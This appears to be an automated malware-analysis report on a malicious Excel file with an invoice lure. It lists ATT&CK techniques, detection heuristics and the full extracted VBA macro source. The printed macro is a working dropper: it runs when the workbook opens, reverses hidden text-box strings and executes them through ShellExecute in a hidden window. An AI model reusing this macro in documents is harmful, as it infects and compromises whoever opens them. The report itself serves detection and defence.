MALICIOUS
108
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The document contains VBA macros that leverage the `Shell.Application` object to execute commands. The heuristic firings indicate a reference to `ShellExecute` and the presence of VBA macros, along with a fake invoice lure. The script's primary function is to execute a command constructed from text boxes within the document, likely to download and run a second-stage payload.
Heuristics 4
-
Reference to ShellExecute API high SC_STR_SHELLEXECReference to ShellExecute API
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set tqsOfhbtsWwINQQzouSY = CreateObject("Shell.Application") tqsOfhbtsWwINQQzouSY.ShellExecute "P" + cozBWQucK(fjkerooos), cozBWQucK(fgfjhfgfg), "", "", 0 -
Fake invoice / payment lure low SE_INVOICE_LUREDocument contains invoice or payment language paired with an action verb — useful context when combined with link, macro, or attachment indicators
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1314 bytes |
SHA-256: 5876905b812d9423644ee868c6bf0af0b9b177461037e8431492f38e9e8592bb |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Activate()
Dim fGOzlqhZXccU, mNnDRGQmct, fgfyh, NGFPAxqkmttRDiX
Set mNnDRGQmct = ThisWorkbook.Sheets.Item(1)
With mNnDRGQmct
fGOzlqhZXccU = .TextBoxes("TextBox 1").Text
t7gh0 = .TextBoxes("TextBox 2").Text
End With
fgfyh = yMVumusAfyHAAMsz(fGOzlqhZXccU, t7gh0)
End Sub
Function yMVumusAfyHAAMsz(fgfjhfgfg, fjkerooos)
Dim tqsOfhbtsWwINQQzouSY
Set tqsOfhbtsWwINQQzouSY = CreateObject("Shell.Application")
tqsOfhbtsWwINQQzouSY.ShellExecute "P" + cozBWQucK(fjkerooos), cozBWQucK(fgfjhfgfg), "", "", 0
End Function
Function cozBWQucK(s)
Dim p
For p = Len(s) To 1 Step -1
cozBWQucK = cozBWQucK & Mid(s, p, 1)
Next
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.